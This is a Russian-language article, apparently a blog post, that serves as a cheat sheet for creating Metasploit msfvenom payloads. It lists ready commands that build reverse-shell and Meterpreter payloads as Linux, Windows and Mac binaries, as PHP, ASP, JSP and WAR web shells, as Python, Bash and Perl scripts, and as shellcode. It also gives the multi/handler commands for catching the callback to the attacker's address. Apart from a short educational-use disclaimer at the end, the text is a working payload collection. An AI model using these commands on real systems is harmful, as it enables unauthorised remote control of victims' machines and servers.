Metasploit Payloads или заметки о MSFvenom

Представляем Вашему вниманию полезные заметки о создании полезной нагрузки для осуществления коннекта к "жертве"

Часто одна из наиболее полезных (и недооцененных для начинающих) способностей Metasploit - это модуль msfpayload.

С помощью этого модуля можно создать несколько полезных нагрузок, что поможет Вам создать бэкконнект практически в любой ситуации. Для каждой из приведенных ниже примеров полезных нагрузок Вы можете зайти в msfconsole и выбрать exploit/multi/handler.

Запустите «set payload» для соответствующей используемой полезной нагрузки и настройте все необходимые параметры set (LHOST, LPORT и т. д.). Посмотреть параметры можно с помощью команды

show options

К примеру:

set payload java/jsp_shell_bind_tcp

Для приведенных ниже примеров это довольно очевидно, но LHOST должен быть заполнен вашим IP-адресом (IP-адрес локальной сети при атаке в сети, IP-адрес глобальной сети при атаке через Интернет (внешний IP-адрес можно увидеть перейдя по ссылке)), а LPORT должен быть Вашим открытым локальным портом, к которому будет осуществляться подключение.

Посмотреть список всех полезных нагрузок

msfvenom -l

BINARIES

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

WEB PAYLOADS

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

SCRIPTING PAYLOADS

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

SHELLCODE

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Пример

Все данные пэйлоады должны выполняться в следующем порядке

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Надеюсь было полезно, так же смотрите нашу статью о поднятии Reverce-шела.

ДисклеймерДанная статья написана только в образовательных целях и автор не несёт ответственности за ваши действия. Ни в коем случае не призываем читателей на совершение противозаконных действий.